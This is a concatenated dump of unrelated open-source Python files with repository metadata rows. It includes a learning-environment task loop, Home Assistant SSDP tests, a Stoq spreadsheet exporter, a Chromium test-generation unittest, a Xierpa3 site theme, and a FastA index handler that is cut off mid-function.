        # Make sure we have a task
        if not self._current_task:
            self._switch_new_task()

        # If the task has not reached the end by either Timeout or
        # achieving the goal
        if not self._current_task.has_ended():
            reward = None
            # Check if a Timeout occurred
            self._current_task.check_timeout(self._task_time)
            # Process the input from the learner and raise events
            if learner_input is not None:
                # record the input from the learner and deserialize it
                # TODO this bit is dropped otherwise on a timeout...
                self._input_channel.consume(learner_input)

            # switch to next task immediately if this input caused the task to end
            # and there is no feedback to output (output_channel is empty)
            if self._current_task.has_ended() and self._output_channel.is_empty():
                self._switch_new_task()
        # We are in the middle of the task, so no rewards are given
        else:
            # If the task is ended and there is nothing else to say,
            # issue a silence and then return reward and move to next task
            if self._output_channel.is_empty():
                if self._task_separator_issued or self._should_skip_separator():
                    # Have nothing more to say
                    # reward the learner if necessary and switch to new task
                    reward = self._reward if self._reward is not None else 0
                    self._switch_new_task()
                    self._task_separator_issued = False
                else:
                    self._output_channel.set_message(
                        self._serializer.SILENCE_TOKEN)
                    self._task_separator_issued = True
                    reward = None
            else:
                # TODO: decide what to do here.
                # Should we consume the bit or not?
                self._input_channel.consume(learner_input)
                # If there is still something to say, continue saying it
                reward = None

        # Get one bit from the output buffer and ship it
        if self._output_channel.is_empty():
            self._output_channel.set_message(self._serializer.SILENCE_TOKEN)
        output = self._output_channel.consume()

        # we hear to ourselves
        self._output_channel_listener.consume(output)
        # advance time
        self._task_time += 1

        if self._immediate_reward is not None and reward is None:
            reward = self._immediate_reward
            self._immediate_reward = None
        if reward is not None:
            # process the reward (clearing it if it's not allowed)
            reward = self._allowable_reward(reward)
        else:
            reward = 0

        return output, reward

    def get_reward_per_task(self):
        '''
        Returns a dictionary that contains the cumulative reward for each
        task.
        '''
        return self._reward_per_task

    def _allowable_reward(self, reward):
        '''Checks if the reward is allowed within the limits of the
        `max_reward_per_task` parameter, and resets it to 0 if not.'''
        task_name = self._current_task.get_name()
        if self._reward_per_task[task_name] < self._max_reward_per_task:
            self._reward_per_task[task_name] += reward
            return reward
        else:
            return 0

    def is_silent(self):
        '''
        Tells if the environment is sending any information through the output
        channel.
        '''
        return self._output_channel.is_silent()

    def _on_input_sequence_updated(self, sequence):
        if self.event_manager.raise_event(SequenceReceived(sequence)):
            self.logger.debug("Sequence received by running task: '{0}'".format(
                sequence))

    def _on_input_message_updated(self, message):
        # send the current received message to the task
        if self.event_manager.raise_event(MessageReceived(
                message)):
            self.logger.debug("Message received by running task: '{0}'".format(
                message))

    def _on_output_sequence_updated(self, sequence):
        self.event_manager.raise_event(OutputSequenceUpdated(sequence))

    def _on_output_message_updated(self, message):
        self.event_manager.raise_event(OutputMessageUpdated(message))

    def _should_skip_separator(self):
        # Tasks may opt out of the inter-task separator by setting this flag.
        return hasattr(self._current_task, 'skip_task_separator') and self._current_task.skip_task_separator

    def set_result(self, result, message='', priority=0, provide_result_as_reward=True):
        '''Ends the current task instance with the given result, optionally
        turning the result into the end-of-task reward.'''
        # the following two ifs prevent repeating the same feedback ad infinitum,
        # which otherwise happens in mini-tasks in case of a repeated invalid
        # input. self._result is set back to None every time a new task is
        # switched.
        if self._result is True and result is True:
            return
        if self._result is False and result is False:
            return
        if provide_result_as_reward:
            self._reward = result
        self._result = result
        self._current_task.end()
        self.logger.debug('Terminating instance with result {0} with message "{1}"'
                          ' and priority {2}'
                          .format(result, message, priority))
        # adds a final space to the final message of the task
        # to separate the next task instructions
        self.set_message(message, priority)

    def set_immediate_reward(self, reward):
        '''Sets the reward immediately'''
        self._immediate_reward = reward
        self.logger.debug('Setting immediate reward {}'.format(reward))

    def set_message(self, message, priority=0):
        ''' Saves the message in the output buffer so it can be delivered
        bit by bit. It overwrites any previous content.
        '''
        if self._output_channel.is_empty() or priority >= self._output_priority:
            self.logger.debug('Setting message "{0}" with priority {1}'
                              .format(message, priority))
            self._output_channel.set_message(message)
            self._output_priority = priority
        else:
            self.logger.info(
                'Message "{0}" blocked because of '
                'low priority ({1}<{2}) '.format(
                    message, priority, self._output_priority)
            )

    def raise_event(self, event):
        return self.event_manager.raise_event(event)

    def raise_state_changed(self):
        '''
        This raises a StateChanged Event, meaning that something
        in the state of the world or the tasks changed (but we
        don't keep track what)
        '''
        # state changed events can only be raised if the current task is
        # started
        if self._current_task and self._current_task.has_started():
            # tasks that have a world should also take the world state as
            # an argument
            if self._current_world:
                self.raise_event(StateChanged(
                    self._current_world.state, self._current_task.state))
            else:
                self.raise_event(StateChanged(self._current_task.state))
            return True
        return False

    def _switch_new_task(self):
        '''
        Asks the task scheduler for a new task,
        reset buffers and time, and registers the event handlers
        '''
        # deregister previous event managers
        if self._current_task:
            self._current_task.deinit()
            self._deregister_task_triggers(self._current_task)

        # pick a new task
        # (fixed: was "!= None"; identity comparison is the correct idiom)
        if self._result is not None:
            self._last_result = self._result
            self._task_scheduler.reward(self._result)
            self._result = None

        self._current_task = self._task_scheduler.get_next_task()
        try:
            # This is to check whether the user didn't mess up in instantiating
            # the class
            self._current_task.get_world()
        except TypeError:
            raise RuntimeError("The task {0} is not correctly instantiated. "
                               "Are you sure you are not forgetting to "
                               "instantiate the class?".format(
                                   self._current_task))
        self.logger.debug("Starting new task: {0}".format(self._current_task))

        # check if it has a world:
        if self._current_task.get_world() != self._current_world:
            # if we had an ongoing world, end it.
            if self._current_world:
                self._current_world.end()
                self._deregister_task_triggers(self._current_world)
            self._current_world = self._current_task.get_world()
            if self._current_world:
                # register new event handlers for the world
                self._register_task_triggers(self._current_world)
                # initialize the new world
                self._current_world.start(self)
            self.world_updated(self._current_world)
        # reset state
        self._task_time = 0
        self._reward = None
        self._input_channel.clear()
        self._output_channel.clear()
        self._output_channel_listener.clear()
        # register new event handlers
        self._register_task_triggers(self._current_task)
        # start the task, sending the current environment
        # so it can interact by sending back rewards and messages
        self._current_task.start(self)
        self.task_updated(self._current_task)

    def _deregister_task_triggers(self, task):
        for trigger in task.get_triggers():
            try:
                self.event_manager.deregister(task, trigger)
            except ValueError:
                # if the trigger was not registered, we don't worry about it
                pass
            except KeyError:
                # if the trigger was not registered, we don't worry about it
                pass
        task.clean_dynamic_handlers()

    def _register_task_triggers(self, task):
        for trigger in task.get_triggers():
            self._register_task_trigger(task, trigger)

    def _register_task_trigger(self, task, trigger):
        self.event_manager.register(task, trigger)
| bsd-3-clause | 5,099,730,751,178,480,000 | 41.510086 | 119 | 0.610128 | false | 4.56546 | false | false | false |
tboyce021/home-assistant | tests/components/ssdp/test_init.py | 2 | 4786 | """Test the SSDP integration."""
import asyncio
from unittest.mock import Mock, patch
import aiohttp
import pytest
from homeassistant.components import ssdp
from tests.common import mock_coro
async def test_scan_match_st(hass, caplog):
    """A scanner entry whose ST matches a registered domain starts a flow."""
    scanner = ssdp.Scanner(hass, {"mock-domain": [{"st": "mock-st"}]})

    entry = Mock(
        st="mock-st",
        location=None,
        values={"usn": "mock-usn", "server": "mock-server", "ext": ""},
    )
    with patch("netdisco.ssdp.scan", return_value=[entry]), patch.object(
        hass.config_entries.flow, "async_init", return_value=mock_coro()
    ) as flow_init:
        await scanner.async_scan(None)

    assert len(flow_init.mock_calls) == 1
    call = flow_init.mock_calls[0]
    assert call[1][0] == "mock-domain"
    assert call[2]["context"] == {"source": "ssdp"}
    expected_data = {
        ssdp.ATTR_SSDP_ST: "mock-st",
        ssdp.ATTR_SSDP_LOCATION: None,
        ssdp.ATTR_SSDP_USN: "mock-usn",
        ssdp.ATTR_SSDP_SERVER: "mock-server",
        ssdp.ATTR_SSDP_EXT: "",
    }
    assert call[2]["data"] == expected_data
    assert "Failed to fetch ssdp data" not in caplog.text
@pytest.mark.parametrize(
    "key", (ssdp.ATTR_UPNP_MANUFACTURER, ssdp.ATTR_UPNP_DEVICE_TYPE)
)
async def test_scan_match_upnp_devicedesc(hass, aioclient_mock, key):
    """A flow starts when the UPnP device description matches the config."""
    aioclient_mock.get(
        "http://1.1.1.1",
        text=f"""
    <root>
      <device>
        <{key}>Paulus</{key}>
      </device>
    </root>
    """,
    )

    scanner = ssdp.Scanner(hass, {"mock-domain": [{key: "Paulus"}]})
    entries = [Mock(st="mock-st", location="http://1.1.1.1", values={})]

    with patch("netdisco.ssdp.scan", return_value=entries), patch.object(
        hass.config_entries.flow, "async_init", return_value=mock_coro()
    ) as flow_init:
        await scanner.async_scan(None)

    assert len(flow_init.mock_calls) == 1
    assert flow_init.mock_calls[0][1][0] == "mock-domain"
    assert flow_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
async def test_scan_not_all_present(hass, aioclient_mock):
    """No flow is started when a required attribute is missing entirely."""
    aioclient_mock.get(
        "http://1.1.1.1",
        text="""
    <root>
      <device>
        <deviceType>Paulus</deviceType>
      </device>
    </root>
    """,
    )

    matchers = {
        "mock-domain": [
            {
                ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
                ssdp.ATTR_UPNP_MANUFACTURER: "Paulus",
            }
        ]
    }
    scanner = ssdp.Scanner(hass, matchers)
    entries = [Mock(st="mock-st", location="http://1.1.1.1", values={})]

    with patch("netdisco.ssdp.scan", return_value=entries), patch.object(
        hass.config_entries.flow, "async_init", return_value=mock_coro()
    ) as flow_init:
        await scanner.async_scan(None)

    assert not flow_init.mock_calls
async def test_scan_not_all_match(hass, aioclient_mock):
    """No flow is started when a required attribute has a different value."""
    aioclient_mock.get(
        "http://1.1.1.1",
        text="""
    <root>
      <device>
        <deviceType>Paulus</deviceType>
        <manufacturer>Paulus</manufacturer>
      </device>
    </root>
    """,
    )

    matchers = {
        "mock-domain": [
            {
                ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
                ssdp.ATTR_UPNP_MANUFACTURER: "Not-Paulus",
            }
        ]
    }
    scanner = ssdp.Scanner(hass, matchers)
    entries = [Mock(st="mock-st", location="http://1.1.1.1", values={})]

    with patch("netdisco.ssdp.scan", return_value=entries), patch.object(
        hass.config_entries.flow, "async_init", return_value=mock_coro()
    ) as flow_init:
        await scanner.async_scan(None)

    assert not flow_init.mock_calls
@pytest.mark.parametrize("exc", [asyncio.TimeoutError, aiohttp.ClientError])
async def test_scan_description_fetch_fail(hass, aioclient_mock, exc):
    """A network error while fetching the description is handled gracefully."""
    aioclient_mock.get("http://1.1.1.1", exc=exc)
    scanner = ssdp.Scanner(hass, {})
    entries = [Mock(st="mock-st", location="http://1.1.1.1", values={})]

    with patch("netdisco.ssdp.scan", return_value=entries):
        await scanner.async_scan(None)
async def test_scan_description_parse_fail(hass, aioclient_mock):
    """Malformed description XML is handled gracefully."""
    aioclient_mock.get(
        "http://1.1.1.1",
        text="""
    <root>INVALIDXML
    """,
    )
    scanner = ssdp.Scanner(hass, {})
    entries = [Mock(st="mock-st", location="http://1.1.1.1", values={})]

    with patch("netdisco.ssdp.scan", return_value=entries):
        await scanner.async_scan(None)
| apache-2.0 | 5,570,147,458,681,157,000 | 26.825581 | 80 | 0.568533 | false | 3.207775 | true | false | false |
tiagocardosos/stoq | stoqlib/gui/dialogs/spreadsheetexporterdialog.py | 2 | 3749 | # -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008-2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <[email protected]>
##
"""Spreedsheet Exporter Dialog"""
import gio
import gtk
from stoqlib.api import api
from stoqlib.exporters.xlsexporter import XLSExporter
from stoqlib.lib.message import yesno
from stoqlib.lib.translation import stoqlib_gettext
_ = stoqlib_gettext
class SpreadSheetExporter:
    """Exports a list of objects to an XLS spreadsheet and then either opens
    the resulting file with the system spreadsheet application or saves it
    to disk, depending on the user's settings.
    """
    # Fixed typo: was 'Exporter to Spreadseet'.
    title = _('Exporter to Spreadsheet')

    def export(self, object_list, name, filename_prefix, data=None):
        """Build a spreadsheet from *object_list* and hand it to the user."""
        xls = XLSExporter(name)
        xls.add_from_object_list(object_list, data)
        temporary = xls.save(filename_prefix)
        self.export_temporary(temporary)

    def export_temporary(self, temporary):
        """Open or save the generated temporary file, per user settings."""
        mime_type = 'application/vnd.ms-excel'
        app_info = gio.app_info_get_default_for_type(mime_type, False)
        if app_info:
            action = api.user_settings.get('spreadsheet-action')
            if action is None:
                action = 'open'
        else:
            # No application can open the file, so saving is the only option.
            action = 'save'

        if action == 'ask':
            action = self._ask(app_info)

        if action == 'open':
            temporary.close()
            self._open_application(mime_type, temporary.name)
        elif action == 'save':
            self._save(temporary)

    def _ask(self, app_info):
        """Ask the user whether to open or save; returns 'open' or 'save'."""
        # FIXME: What if the user presses esc? Esc will return False
        # and open action will be executed. Esc should cancel the action
        if yesno(_("A spreadsheet has been created, "
                   "what do you want to do with it?"),
                 gtk.RESPONSE_NO,
                 _('Save it to disk'),
                 _("Open with %s") % (app_info.get_name())):
            return 'save'
        else:
            return 'open'

    def _open_application(self, mime_type, filename):
        """Launch the default application for *mime_type* on *filename*."""
        app_info = gio.app_info_get_default_for_type(mime_type, False)
        gfile = gio.File(path=filename)
        app_info.launch([gfile])

    def _save(self, temp):
        """Show a save dialog and write the temporary file's contents there."""
        chooser = gtk.FileChooserDialog(
            _("Export Spreadsheet..."), None,
            gtk.FILE_CHOOSER_ACTION_SAVE,
            (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
             gtk.STOCK_SAVE, gtk.RESPONSE_OK))
        chooser.set_do_overwrite_confirmation(True)

        xls_filter = gtk.FileFilter()
        xls_filter.set_name(_('Excel Files'))
        xls_filter.add_pattern('*.xls')
        chooser.add_filter(xls_filter)
        response = chooser.run()

        filename = None
        if response != gtk.RESPONSE_OK:
            chooser.destroy()
            return

        filename = chooser.get_filename()
        ext = '.xls'
        chooser.destroy()

        if not filename.endswith(ext):
            filename += ext

        # Open in binary format so windows dont replace '\n' with '\r\n'.
        # Fixed: close the output file deterministically instead of relying
        # on refcounting of an anonymous file object.
        with open(filename, 'wb') as out:
            out.write(temp.read())
        temp.close()
| gpl-2.0 | 3,608,650,358,370,720,000 | 31.318966 | 78 | 0.616164 | false | 3.779234 | false | false | false |
chromium/chromium | chrome/test/webapps/generate_framework_tests_and_coverage_unittest.py | 1 | 2889 | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from io import StringIO
import os
import sys
import unittest
import tempfile
from generate_framework_tests_and_coverage import generate_framework_tests_and_coverage
from models import TestPartitionDescription
from models import TestPlatform
# Directory (next to this file) holding the checked-in inputs and the
# expected coverage output files the test compares against.
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                             "test_data")
class GenerateFrameworkTestsAndCoverageTest(unittest.TestCase):
    """End-to-end check of generate_framework_tests_and_coverage() against
    the golden files in test_data/."""

    def test_coverage(self):
        actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.csv")
        coverage_filename = os.path.join(TEST_DATA_DIR,
                                         "test_unprocessed_coverage.csv")
        custom_partitions = [
            TestPartitionDescription(
                action_name_prefixes={"state_change_b"},
                browsertest_dir=TEST_DATA_DIR,
                test_file_prefix="tests_change_b",
                test_fixture="TwoClientWebAppsIntegrationSyncTest")
        ]
        default_partition = TestPartitionDescription(
            action_name_prefixes=set(),
            browsertest_dir=TEST_DATA_DIR,
            test_file_prefix="tests_default",
            test_fixture="WebAppIntegrationBrowserTest")
        with open(actions_filename) as actions_file, \
                open(coverage_filename) as coverage_file, \
                tempfile.TemporaryDirectory() as output_dir:
            captured_output = StringIO()
            sys.stdout = captured_output
            try:
                generate_framework_tests_and_coverage(actions_file,
                                                      coverage_file,
                                                      custom_partitions,
                                                      default_partition,
                                                      output_dir, None)
            finally:
                # Always restore stdout, even if generation raises.
                sys.stdout = sys.__stdout__

            # The framework uses stdout to inform the developer of tests that
            # need to be added or removed. Since there should be no test
            # changes required, nothing should be printed to stdout.
            # BUG FIX: the original called capturedOutput.read(), which always
            # returns '' because the stream position sits at the end after the
            # writes; getvalue() returns the full captured text.
            self.assertFalse(captured_output.getvalue())

            for platform in TestPlatform:
                file_title = "coverage" + platform.suffix + ".tsv"
                gen_coverage_filename = os.path.join(output_dir, file_title)
                expected_coverage_filename = os.path.join(
                    TEST_DATA_DIR, "expected_" + file_title)
                with open(gen_coverage_filename) as generated_file, \
                        open(expected_coverage_filename) as expected_file:
                    self.assertListEqual(generated_file.readlines(),
                                         expected_file.readlines())
# Allow running this file directly, outside a test-runner harness.
if __name__ == '__main__':
    unittest.main()
| bsd-3-clause | 7,397,029,959,659,532,000 | 42.772727 | 87 | 0.591208 | false | 4.728314 | true | false | false |
petrvanblokland/Xierpa3 | xierpa3/sites/examples/dbdwebsite/make.py | 1 | 6285 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
# Demo site for the simple "BasicWebsite" example.
# Each of the builders takes the information from the theme to build its
# own type of file.
#
import webbrowser
from xierpa3.attributes import Color, Em, Perc
from xierpa3.components import Theme, Page, Column, Logo, Menu, MobileNavigation, Container, Article, \
ArticleSideBar, Footer, FeaturedByImage, FeaturedByDiapText, FeaturedByText, FeaturedByImageList, \
ArticlesList, PosterHead
from xierpa3.descriptors.blueprint import BluePrint
from xierpa3.descriptors.media import Media
from xierpa3.toolbox.transformer import TX
from xierpa3.adapters.textilefileadapter import TextileFileAdapter
# Load @fontface fonts for this example from www.webtype.com
BODYFAMILY = '"Benton Sans RE", Verdana, sans'  # CSS font stack for body text.
HEADFAMILY = '"Hermes FB Semibold", Impact, Verdana, sans'  # CSS font stack for headings.
class Top(Container):
    u"""Page header container holding the logo and menu.

    Inherits the MobileNavigation blueprint values; in baseComponents() it is
    instantiated with a Media query that hides it on mobile widths.
    """
    BLUEPRINT = BluePrint(MobileNavigation.BLUEPRINT,
        # Layout alternatives
        backgroundColor=Color('#fff'), doc_backgroundColor='Top background color.',
    )
class Navigation(Column):
    u"""Simple link list over all ranked articles of the site adapter."""

    def buildBlock(self, b):
        u"""Build a div with one link (or a placeholder) per ranked article."""
        b.div(class_='navigation', marginbottom=Em(2), paddingright=Em(1), backgroundcolor=Color('#EEE'))
        for article in self.adapter.getRankedArticles():
            if not article.title:
                # Articles without a title get visible placeholder text instead of a link.
                b.text('No title for article "%s"' % article.id)
            else:
                b.a(href='/article-%s' % article.id, fontsize=Em(0.8), marginright=Em(1), color=Color('#888'))
                b.text(article.title)
                b._a()
            b.br()
        b._div()
class DbdWebsite(Theme):
    u"""The *DbdWebsite* generates the DoingByDesign website from a given adapter with all navigation
    and content in place. The styling is not different from default (no additional styling added,
    except what is already defined in the @component.BLUEPRINT@)."""
    C = Theme.C

    TITLE = u'Doing by Design' # Use as title of window.

    XIERPA3_DEMOFONTS = "//cloud.webtype.com/css/34d3e5fe-7dee-4122-9e87-ea5ee4a90a05.css"

    URL_FONTS = [
        # Note that this package contains a set of latest featured fonts, and may be changed in the future.
        # If using the font in this package, safest is to refer to the functional constant names below,
        # instead of making a direct reference to the family name.
        # Of course, taking your own account at //www.webtype.com is even better :)
        XIERPA3_DEMOFONTS, # Webtype @fontface fonts, to be used for localhost demo purposes.
    ]
    # The single column is filled by the self.adapter article query result and standard navigation.
    # The default b.adapter takes the articles from the DbD site.

    def baseStyle(self):
        u"""Answer the single basis style that will be defined as overall CSS, before
        specific block definitions start."""
        s = Article.BLUEPRINT
        root = self.newStyle() # Create root style
        root.addStyle('body', fontfamily=BODYFAMILY, fontsize=s.fontSize,
            backgroundcolor=s.pageBackgroundColor, lineheight=s.lineHeight)
        # NOTE(review): the following calls add styles to the Article BLUEPRINT
        # (s) rather than to the root style created above — inconsistent with
        # the 'body' rule; verify this is intentional before changing.
        s.addStyle('h1, h2, h3, h4, h5, p.lead', fontfamily=HEADFAMILY)
        s.addStyle('h6', fontfamily=BODYFAMILY)
        s.addStyle('b', fontweight=self.C.BOLD)
        s.addStyle('a', color=Color('#CECECE'))
        return root

    def getSiteAdapter(self):
        u"""Answer the adapter for this site, including all articles of the DbD site."""
        from xierpa3.sites import doingbydesign
        # Root path where to find the article Simples wiki file for this example page.
        articleRoot = TX.module2Path(doingbydesign) + '/files/articles/'
        return TextileFileAdapter(articleRoot) # Preferred adapter class for articles in this site.

    def baseComponents(self):
        u"""Create a theme site with just one single template home page. Answer a list
        of page instances that are used as templates for this site."""
        # Create an instance (=object) of components to be placed on the page.
        # Import current example site, as anchor for the article files.
        adapter = self.getSiteAdapter()
        logo = Logo()
        menu = Menu()
        navigation = Navigation()
        article = Article(showPoster=False) # No poster inside the article. We use the PosterHead component.
        articleSideBar = ArticleSideBar(showChapterNavigation=True)
        articlesList = ArticlesList()
        posterhead = PosterHead() # Wordpress-like big picture from article.poster link.
        featuredByImage = FeaturedByImage()
        featuredByDiapText = FeaturedByDiapText()
        featuredByText = FeaturedByText()
        featuredByImageList = FeaturedByImageList()
        # Containers for pages
        top = Top(components=(logo, menu), media=Media(max=self.C.M_MOBILE_MAX, display=self.C.NONE))
        homeContainer = Container(components=(featuredByDiapText, featuredByImage, featuredByText,
            featuredByImageList))
        articleContainer = Container(components=(posterhead, article, articleSideBar))
        articlesListContainer = Container(articlesList,)
        footer = Footer()
        # Create an instance (=object) of the page, containing the navigation components.
        # The class is also the page name in the url.
        homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(top, homeContainer, footer), adapter=adapter,
            title=self.TITLE, fonts=self.URL_FONTS)
        articlePage = Page(class_=self.C.TEMPLATE_ARTICLE, components=(top, articleContainer, footer), adapter=adapter,
            title=self.TITLE, fonts=self.URL_FONTS)
        articlesPage = Page(class_=self.C.TEMPLATE_ARTICLES, components=(top, articlesListContainer, footer),
            adapter=adapter, title=self.TITLE, fonts=self.URL_FONTS)
        # Answer a list of types of pages for this site. In this case just one template.
        return [homePage, articlePage, articlesPage]
| mit | 374,267,383,479,881,200 | 47.346154 | 119 | 0.668417 | false | 3.813714 | false | false | false |
lpryszcz/bin | FastaIndex.py | 1 | 16107 | #!/usr/bin/env python2
desc="""FastA index (.fai) handler compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
.fai is extended with 4 columns storing counts for A, C, G & T for each sequence.
"""
epilog="""Author: [email protected]
Bratislava, 15/06/2016
"""
import os, sys
from datetime import datetime
def symlink(file1, file2):
"""Create symbolic link taking care of real path."""
if not os.path.isfile(file2):
# check if need for absolute path
file1abs = os.path.join(os.path.realpath(os.path.curdir), file1)
if os.path.isfile(file1abs):
os.symlink(file1abs, file2)
# otherwise create symbolic link without full path
else:
os.symlink(file1, file2)
class FastaIndex(object):
"""Facilitate Fasta index (.fai) operations compatible
with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
def __init__(self, handle, verbose=0, log=sys.stderr):
""" """
ext = ".fai"
self.verbose = verbose
self.log = log.write
self.genomeSize = 0
self.whitespaces_in_headers = False
# guess handle
if type(handle) is str and os.path.isfile(handle):
handle = open(handle)
if type(handle) is file:
if handle.name.endswith(('.gz','.bz')):
raise Exception("Compressed files are currently not supported!")
self.handle = handle
else:
sys.stderr.write("[ERROR] Couldn't guess handle for %s\n"%str(handle))
sys.exit(1)
self.fasta = self.handle.name
self.faidx = self.fasta + ext
# check if fasta is symlink
if not os.path.isfile(self.faidx) and os.path.islink(self.fasta):
_fasta = os.path.realpath(self.fasta)
_faidx = _fasta+ext
# symlink faidx if faidx exists and linked fasta is older than its faidx
if os.path.isfile(_faidx) and os.stat(_fasta).st_mtime < os.stat(_faidx).st_mtime:
symlink(_faidx, self.faidx)
# create new index if no .fai, .fai loading failed or .fai younger than .fasta
if not os.path.isfile(self.faidx) or not self._load_fai() or \
os.stat(self.fasta).st_mtime > os.stat(self.faidx).st_mtime:
self._generate_index()
# links
self.get = self.get_fasta
# init storage
self.base2rc= {"A": "T", "T": "A", "C": "G", "G": "C",
"a": "t", "t": "a", "c": "g", "g": "c",
"N": "N", "n": "n"}
# basecounts
self.basecounts = map(sum, zip(*[stats[-4:] for stats in self.id2stats.itervalues()]))
self.Ns = self.genomeSize - sum(self.basecounts)
def __process_seqentry(self, out, header, seq, offset, pi):
"""Write stats to file and report any issues"""
if header:
# get seqid and sequence stats
seqid = self.get_id(header)
# catch empty headers
if not seqid:
self.log("[WARNING] No header at line: %s\n"%", ".join(map(str, (pi,seqid,header))))
return
stats = self.get_stats(header, seq, offset)
# warn about empty sequences
if not stats[0]:
self.log("[WARNING] No sequence for: %s at line: %s\n"%(seqid, pi))
# catch duplicates
if seqid in self.id2stats:
self.log("[WARNING] Duplicated sequence ID: %s at line: %s\n"%(seqid, pi))
self.id2stats[seqid] = stats
out.write("%s\t%s\n"%(seqid, "\t".join(map(str, stats))))
def _generate_index(self):
"""Return fasta records"""
if self.verbose:
self.log("Generating FastA index...\n")
header, seq = "", []
offset = pi = 0
self.id2stats = {}
with open(self.faidx, 'w') as out:
for i, l in enumerate(iter(self.handle.readline, ''), 1):
if l.startswith(">"):
self.__process_seqentry(out, header, seq, offset, pi)
# mark that there is whitespace in headers
if len(l[:-1].split())>1:
self.whitespaces_in_headers = True
header = l
offset = self.handle.tell()
seq = []
pi = i
else:
seq.append(l)
# process last entry
self.__process_seqentry(out, header, seq, offset, pi)
def _load_fai(self):
"""Load stats from faidx file.
Return False if .fai is wrongly formatted.
"""
self.id2stats = {}
for l in open(self.faidx):
ldata = l[:-1].split('\t')
if len(ldata)<9:
self.whitespaces_in_headers = False
return
rid = ldata[0]
stats = map(int, ldata[1:])
self.id2stats[rid] = stats
# update genomeSize
self.genomeSize += stats[0]
if len(rid.split())>1:
self.whitespaces_in_headers = True
return True
def __len__(self):
"""How many records are there?"""
return len(self.id2stats)
def __iter__(self):
"""Iterate over the keys."""
for seqid in self.id2stats:
yield seqid
def __getitem__(self, key, start=None, stop=None, name=None, seqonly=False):
"""x.__getitem__(y) <==> x[y]"""
if key not in self.id2stats:
#raise KeyError
sys.stderr.write("[Warning] No such entry: %s\n"%key)
return ""
# get offset info
size, offset, linebases, linebytes = self.id2stats[key][:4]
# compute bytes to fetch
linediff = linebytes - linebases
seqid = key
# get sequence slice
if start and stop:
reverse_complement = 0
if start<1:
start = 1
seqid = "%s:%s-%s"%(key, start, stop)
if start>stop:
reverse_complement = 1
start, stop = stop, start
if stop > size:
stop = size
# 1-base, inclusive end
start -= 1
# get bytesize and update offset
offset += start / linebases * linebytes + start % linebases
realsize = stop-start
bytesize = realsize / linebases * linebytes + realsize % linebases
# read sequence slice
self.handle.seek(offset)
seq = self.handle.read(bytesize).replace('\n', '')
if reverse_complement:
seq = self.get_reverse_complement(seq)
if seqonly:
return seq
# format lines
seq = '\n'.join(seq[i:i+linebases] for i in range(0, len(seq), linebases))+'\n'
# load whole sequence record
else:
# get bytesize
bytesize = size / linebases * linebytes + size % linebases
## add line diff for last line only for multiline fasta if last line is not complete
if size / linebytes and size % linebases:
bytesize += linediff
# read entire sequence
self.handle.seek(offset)
seq = self.handle.read(bytesize)
if seqonly:
return "".join(seq.split('\n'))
# update name
if not name:
name = seqid
record = ">%s\n%s"%(name, seq)
return record
def get_reverse_complement(self, seq):
"""Return reverse complement"""
rc = []
for seqsegment in seq.split():
for b in seqsegment:
if b in self.base2rc:
rc.append(self.base2rc[b])
else:
rc.append(b)
return "".join(reversed(rc))
def get_sequence(self, contig, reverse=False):
"""Return sequence of given contig"""
seq = self.__getitem__(contig, seqonly=True)
if reverse:
return self.get_reverse_complement(seq)
return seq
def get_fasta(self, region="", contig="", start=None, stop=None, name=None):
"""Return FastA slice"""
if region:
if ':' in region:
#if '-' in region:
try:
contig, startstop = region.split(':')
start, stop = map(int, startstop.split('-'))
except Exception:
raise Exception("Malformed region definition: %s, while expected contig:start-stop"%region)
else:
contig = region
elif not contig:
self.log("Provide region or contig!\n")
return
# get record
record = self.__getitem__(contig, start, stop, name)
return record
def get_id(self, header):
"""Return seqid from header"""
# catch empty headers
if len(header.strip())<2:
return
return header[1:].split()[0]
def get_stats(self, header, seq, offset):
"""Return seq length, offset, linebases, linebyts and number of
A, C, G and T in each sequence.
Compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
errors = 0
# get bases & bytes in line, ignoring last line
if len(seq)>1:
linebases = set(len(s.strip()) for s in seq[:-1])
linebytes = set(len(s) for s in seq[:-1])
if len(linebases)>1:
self.log("[WARNING] Uneven line lengths in %s: %s\n"%(header, ",".join(map(str, linebases))))
linebases, linebytes = max(linebases), max(linebytes)
elif len(seq)==1:
linebases, linebytes = len(seq[0].strip()), len(seq[0])
# handle empty sequences https://github.com/lpryszcz/redundans/issues/13
else:
linebases, linebytes = 60, 61 #len(seq[0].strip()), len(seq[0])
seq = "".join(s.strip() for s in seq)
seqlen = len(seq)
self.genomeSize += seqlen
# count ACGT
bases = {'A': 0, 'C': 0, 'G': 0, 'T': 0, 'N': 0}
for b in seq.upper():
if b in bases:
try:
bases[b] += 1
except:
errors += 1
return (seqlen, offset, linebases, linebytes, \
bases['A'], bases['C'], bases['G'], bases['T'])
def sort(self, reverse=1, minLength=0, genomeFrac=0):
"""Return list of contigs sorted by descending size (reverse=1).
The list of returned contigs can be limited by:
- minLength - return contigs longer than bases [0]
- genomeFrac - return the longest contigs until genomeFrac is reached [all]
"""
# get all contigs
